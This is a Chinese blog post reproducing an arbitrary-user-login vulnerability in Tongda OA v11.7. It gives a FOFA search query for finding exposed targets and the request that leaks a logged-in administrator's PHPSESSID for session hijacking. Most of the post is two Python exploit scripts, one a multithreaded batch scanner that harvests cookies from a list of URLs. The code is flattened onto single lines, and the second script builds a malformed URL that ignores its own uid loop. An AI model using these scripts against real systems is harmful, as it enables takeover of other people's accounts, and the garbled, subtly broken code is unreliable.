【漏洞復現】通達OA v11.7 在線任意用戶登錄漏洞

0x00 前言

通達OA V11.7版本存在這任意用戶登錄漏洞,該漏洞需要管理員在線才可以登錄系統,另外一個方面就是編譯在線的uid值進行判斷。

具體fofa語法放在下面:

app="TDXK-通達OA"

0x01 在線用戶判斷

訪問 :

http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

如果頁面時空白的,則說明管理員在線,即可以利用

如果顯示RELOGIN,則不可以利用

0x02 任意用戶登錄

獲取到uid=1的cookie

同時訪問即可進行登錄后臺:

http://127.0.0.1/general/

0x03 POC檢測腳本

通過遍歷uid的值,判斷用戶是否上線過,實現任意用戶登錄,同時該謝大佬腳本,更改了一下批量測試腳本:

import requestsimport sysimport randomimport reimport timeimport threadingfrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():    print('+------------------------------------------')    print('+  \033[34mVersion: 通達OA 11.7            ')    print('+  \033[34mVersion: 用法:python3 poc.py http://xxx.xxx.xxx.xxx/            ')    print('+------------------------------------------')def POC_1(target_url):    vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",    }    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)        if "RELOGIN" in response.text and response.status_code == 200:            print(target_url.replace("\n","") +"\033[31m[x] 目標用戶為下線狀態 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))        elif response.status_code == 200 and response.text == "":            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))            print(target_url.replace("\n","") + "\033[32m[o] 用戶上線 PHPSESSION: {} --- {}\033[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))        else:            print("\033[31m[x] 請求失敗,目標可能不存在漏洞")            sys.exit(0)    except Exception as e:        print("\033[31m[x] 請求失敗 \033[0m", e)if __name__ == '__main__':    title()    # target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))    # while True:    #     POC_1(target_url)    #     time.sleep(5)    # 批量檢測    for url in open("url.txt"):        # POC_1(url)        t1 = threading.Thread(target=POC_1, args=(url.replace("\n", ""),))        t1.start()

網上師傅的腳本:

import requestsfrom bs4 import BeautifulSoupimport sysimport reurl = sys.argv[1]for i in range(1,10000):    try :        vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&u&P_VER=0"        resp = requests.get(vuln_url)        soup = BeautifulSoup(resp.text,'html.parser')            if 'RELOGIN' in soup.get_text():            print("不存在")        else:            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))            print('uid='+str(i)+"在線"+"對應的COOKIE值是:PHPSESSID="+str(PHPSESSION[0]))            break    except:        break

轉載請注明:Adminxe's Blog?【漏洞復現】通達OA v11.7 在線任意用戶登錄漏洞